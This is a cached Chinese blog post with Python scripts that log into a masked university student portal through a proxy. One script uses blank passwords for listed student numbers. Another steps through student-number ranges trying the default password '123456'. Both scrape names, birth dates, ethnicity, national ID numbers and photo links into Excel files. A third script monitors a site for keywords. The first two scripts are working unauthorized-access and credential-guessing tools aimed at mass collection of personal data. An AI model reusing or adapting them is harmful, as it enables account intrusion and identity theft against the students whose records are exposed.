py读写Excel模拟登陆代理爬取

2014-09-22 Golmic 更多博文 » 博客 » GitHub »

原文链接 http://code.lujq.me/2014/09/22/py%E8%AF%BB%E5%86%99Excel%E6%A8%A1%E6%8B%9F%E7%99%BB%E9%99%86%E4%BB%A3%E7%90%86%E7%88%AC%E5%8F%96/
注：以下为加速网络访问所做的原文缓存，经过重新格式化，可能存在格式方面的问题，或偶有遗漏信息，请以原文为准。

下列代码全部基于python3.4

import urllib.parse,urllib.request,http.cookiejar,os,xlrd,xlwt3,time,random
print ("########   确保关闭了所有的EXCEL，运行时不要打开任何EXCEL文件 ########")
rfile = xlrd.open_workbook('read.xls')  
rfile.sheet_names()
rsheet = rfile.sheet_by_name(u'Sheet1')
resultfilenum = 0
result = str(resultfilenum)+".xls"
i = 0
if os.path.exists(result):
    while os.path.exists(result):
        resultfilenum += 1
        result = str(resultfilenum)+".xls"
    resultfilenum -= 1
    result = str(resultfilenum)+".xls"
    wfile = xlrd.open_workbook(result)
    wfile.sheet_names()
    wsheet = wfile.sheet_by_name(u'Sheet1')
    lasttask = wsheet.col_values(0)[-1]
    for schnum in rsheet.col_values(0):
        i += 1
        if schnum == lasttask :
            break
else :
    resultfilenum -= 1
wfile = xlwt3.Workbook()
wsheet = wfile.add_sheet('Sheet1')
resultfilenum += 1
result = str(resultfilenum)+".xls"
cookie = http.cookiejar.CookieJar() 
cookieProc = urllib.request.HTTPCookieProcessor(cookie) 
authinfo = urllib.request.HTTPBasicAuthHandler()
proxy_support = urllib.request.ProxyHandler({"http" : "http://127.0.0.1:8087"})
opener = urllib.request.build_opener(proxy_support, authinfo,cookieProc)
urllib.request.install_opener(opener)      
headers = {
    'User-Agent':'IE 6.0',
    'Host':'www.*******.***************',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Referer':'http://www.*******.***************/login',
    'Cookie':'JSESSIONID=8D46BD035D5B6AC1C443211A21245A27',
    'Connection':'keep-alive'
}
fail = 0    
k = 0
namer = 0
print ("###############   程序初始化完成    ##########")
#stop = int(input("输入运行几次后停止(0是一直循环下去): "))
stop = 0
for schnum in rsheet.col_values(0)[i:]:
    k += 1
    postdata=urllib.parse.urlencode({
        "contextPath":'',
        'contextName':'*******LoginPage',
        'contextPara':'null',
        'sectionName':'login',
        'itemName':'loginAction',
    'controlType':'frame',
    'login_strLoginName':schnum,
    "login_strPassword":''
    }).encode(encoding='UTF8')
    #发送给服务器的数据准备完毕
    log = urllib.request.Request(
        url = 'http://www.*******.***************/bsuims/bsMainFrameInit.do?',
        data = postdata,
        headers = headers
    )
    login = urllib.request.urlopen(log).read().decode("utf-8")
    #发送POST请求传输数据，登陆成功
    info1 = urllib.request.Request(
        url = 'http://www.*******.***************/person/stuinfo_personInfoShow.do?personId=119937&admin=0&accessType=&visualType=1'
    )
    info1 = urllib.request.urlopen(info1).read().decode("utf-8")
    info2 = urllib.request.Request(
        url = 'http://www.*******.***************/person/stuinfo_stuTrainShow.do'
    )
    info2 = urllib.request.urlopen(info2).read().decode("utf-8")
    if info1[240:250] ==  'tml; chars' : 
        order1 = [0 for j in range(27)]
        order2 = [0 for j in range(27)]
        for j in range (1,27):
            order1[j] = info1.find('</td>',order1[j-1]+1)
            order2[j] = info2.find('</td>',order2[j-1]+1)
        name = info1[info1.find('<td width="25%">')+25:order1[3]-8]
        if (name == namer):
            print('与上一个相同')
            continue
        namer = name
        ename = info1[order1[4]+37:order1[5]-8].strip()
        photoid = info1[info1.find('personId=',order1[5])+9:info1.find('&photoType')]
        schoolnum = info1[info1.find('<td width="20%">')+25:order1[8]-8].strip()
        if str(schoolnum) != str(schnum) :
            print("在第"+str(k)+"次执行时循环变量与中间检测结果不符！程序已经终止，检查一下错……")
            print("错误学号是："+str(schnum),schoolnum)
            break
        if info1.find('女') > 0 :sex = '女'
        if info1.find('男') > 0 :sex = '男'
        nation = info1[info1.find('<td width="20%">',order1[15])+25:order1[16]-8]
        brith = info1[info1.find('<td height="25" width="35%">',order1[21])+37:order1[22]-8]
        idnum = info1[info1.find('<td>',order1[25])+13:order1[26]-8]
        admissionnum = info2[info2.find('<td width="28%">')+25:order2[3]-8]
        oversea = info2[info2.find('<td>',order2[6])+22:order2[7]-8]
        brave = info2[info2.find('<td>',order2[8])+22:order2[9]-8]
        college = info2[info2.find('<td>',order2[10])+13:order2[11]-8]
        major = info2[info2.find('<td>',order2[14])+13:order2[15]-8]
        clas = info2[info2.find('<td>',order2[18])+13:order2[19]-8]
        campus = info2[info2.find('<td>',order2[20])+13:order2[21]-8]
        degree = info2[info2.find('<td>',order2[22])+13:order2[23]-8]
        wsheet.write(i,0,schnum)
        wsheet.write(i,1,name)
#        wsheet.write(i,2,sex)
        wsheet.write(i,3,brith)
        wsheet.write(i,4,college)
        wsheet.write(i,5,major)
        wsheet.write(i,6,clas)
        wsheet.write(i,7,campus)
        wsheet.write(i,8,degree)
        wsheet.write(i,9,idnum)
        wsheet.write(i,10,nation)
        wsheet.write(i,11,oversea)
        wsheet.write(i,12,brave)
        wsheet.write(i,13,admissionnum)
        wsheet.write(i,14,ename)
        imgurl="http://www.*******.***************/person/stuinfo_downloadPhoto.do?personId="+str(photoid)+"&photoType=02"
#        imgname=str(sex)+str(schnum)+str(name)+'.jpg'
        imgname= str(schnum)+str(name)+'.jpg'
#        urllib.request.urlretrieve(imgurl,imgname)
    elif info1[240:250] ==  'eturnlogin':  
        print('登录失败')
    else:
        print ("尝试登陆后得到的结果已经在上面打印，与预期不符，程序已经终止,检查错误吧")
        break
    wfile.save(result)
    print ('第%d个已经完成'%(k))
    i += 1
    if k == stop :
        break
#wfile.save(result)
print ('##############################     任务执行完毕        ########################')
print ("本次任务文件保存为 : "+result)

import urllib.parse,urllib.request,http.cookiejar,os,xlrd,xlwt3,time
def deal(info,i):
    o = [0 for j in range(61)]
    for j in range (1,61):
            o[j] = info.find('<p align="center">',o[j-1])+18
    imgurl = info[info.find('<p><img src=')+13:info.find('" ></p>')]
    schoolnum = info[o[2]:o[2]+12]
    if (int(schoolnum) != schnum):
        print(str(schnum)+'  ++++不存在++++ '+schoolnum)
        return
    name = info[o[4]:info.find('<',o[4])]
    sex = info[o[8]:info.find('<',o[8])]
    birth = info[o[10]:info.find('<',o[10])]
    jiguan = info[o[14]:info.find('<',o[14])]
    mianmao = info[o[16]:info.find('<',o[16])]
    leibie =  info[o[20]:info.find('<',o[20])]
    college = info[o[22]:info.find('<',o[22])]
    major = info[o[28]:info.find('<',o[28])]
    lang = info[o[30]:info.find('<',o[30])]
    kaoqu = info[o[32]:info.find('<',o[32])]
    midsch = info[o[34]:info.find('<',o[34])]
    goal = info[o[36]:info.find('<',o[36])]
  #  print(imgurl)
   # print(schoolnum)
    print(schnum,name)
  #  print(sex)
  #  print(birth)
 #   print(jiguan)
  #  print(mianmao)
 #   print(leibie)
  #  print(college)
 #   print(major)
 #   print(lang)
  #  print(kaoqu)
 #   print(midsch)
 #   print(goal)
    wsheet.write(i,0,schoolnum)
    wsheet.write(i,1,name)
    wsheet.write(i,2,sex)
    wsheet.write(i,3,birth)
    wsheet.write(i,4,jiguan)
    wsheet.write(i,5,mianmao)
    wsheet.write(i,6,leibie)
    wsheet.write(i,7,college)
    wsheet.write(i,8,major)
    wsheet.write(i,9,lang)
    wsheet.write(i,10,kaoqu)
    wsheet.write(i,11,midsch)
    wsheet.write(i,12,goal)
    wsheet.write(i,13,imgurl)
    wfile.save(result)
resultfilenum = 0
result = str(resultfilenum)+".xls"
i = 0
k = 0
l = 0 
if os.path.exists(result):
    while os.path.exists(result):
        resultfilenum += 1
        result = str(resultfilenum)+".xls"
    resultfilenum -= 1
    result = str(resultfilenum)+".xls"
    wfile = xlrd.open_workbook(result)
    wfile.sheet_names()
    wsheet = wfile.sheet_by_name(u'Sheet1')
else :
    resultfilenum -= 1
wfile = xlwt3.Workbook()
wsheet = wfile.add_sheet('Sheet1')
resultfilenum += 1
result = str(resultfilenum)+".xls"
cookie = http.cookiejar.CookieJar() 
cookieProc = urllib.request.HTTPCookieProcessor(cookie) 
authinfo = urllib.request.HTTPBasicAuthHandler()
proxy_support = urllib.request.ProxyHandler({"http" : "http://127.0.0.1:8087"})
opener = urllib.request.build_opener(proxy_support, authinfo,cookieProc)
urllib.request.install_opener(opener)
headers = {
    'User-Agent':'IE 6.0',
    'Host':'*********:7890',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Referer':'http://*********:7890/zhxt_bks/xk_login.html',
    'Cookie':'ACCOUNT=73654',
    'Connection':'keep-alive'
}
#for schnum in rsheet.col_values(0)[i:]:
####################################################################
####################################################################
start = ******************
end =  ******************
####################################################################
####################################################################
print ('程序初始化完成，将获取[%d]到[%d]的信息'%(start,end))
for schnum in range (start,end):
#    schnum = int(schnum)
    postdata=urllib.parse.urlencode({
        'stuid':str(schnum),
        'pwd':'123456'  
    }).encode(encoding='gbk')
    log = urllib.request.Request(
        url = 'http://*********:7890/pls/wwwbks/bks_login2.login',
        data = postdata,
        headers = headers
    )
    login = urllib.request.urlopen(log).read()
    cheak = urllib.request.Request(
        url = 'http://*********:7890/pls/wwwbks/bks_login2.loginmessage'
    )
    cheak = urllib.request.urlopen(cheak).read().decode('gbk')
    if ('请先登录再使用!!!' in cheak):
         print(str(schnum)+'  失败')
  #       wsheet.write(l,15,schnum)
 #        l += 1
#         wfile.save(result)
    elif ('你输入了错误的学号或密码' in cheak):
        print(str(schnum)+'  不存在')
        k += 1
        if ( k == 20 ):
            print('连续20个不存在')
            break
    elif ('登录成功!' in cheak ):
        info = urllib.request.Request(
            url = 'http://*********:7890/pls/wwwbks/bks_xj.xjcx'
        )
        info = urllib.request.urlopen(info).read().decode('gbk')
        if (info[200:210] == 't language'):
            deal(info,i)
            i += 1
    else:
        print(cheak)
        print(str(schnum)+'检查看看这是怎么了。')
        break
print('文件保存为'+result)

监控关键词

import urllib.request,os,time
al = [
    "http://*****************.html",
    ]
alt = ["****************",
       ]
def find(a):
    lct = f.find(a)
    lct1 = f[:lct].rfind(">")+1
    lct2 = f.find("<",lct)
    title = f[lct1:lct2]
    lct3 = f[:lct1].rfind("data")
    lct4 = f[:lct].rfind("html")
    url = "http://******.com/htm_"+f[lct3:lct4]+"html"
    if (url in al)or (title in alt):
        print(title)
        return
    else:
        print("标题："+title)
        print(url)
        os.system('cmd')
        time.sleep(80)
authinfo = urllib.request.HTTPBasicAuthHandler()
proxy_support = urllib.request.ProxyHandler({"http" : "http://127.0.0.1:8087"})
opener = urllib.request.build_opener(proxy_support, authinfo)
urllib.request.install_opener(opener)
li = ["关键词1","关键词2","关键词3"]
i = 0
while 1 :
    while 1:
        try:
            f = urllib.request.urlopen('http://**************************').read().decode("gbk")[14800:-2400]
            break
        except:
            print("失败")
            i+=1
            if (i / 5 == 0):
                os.system('cmd')
                time.sleep(150)
    for a in li:
        if (a in f):
            find(a)
    time.sleep(50)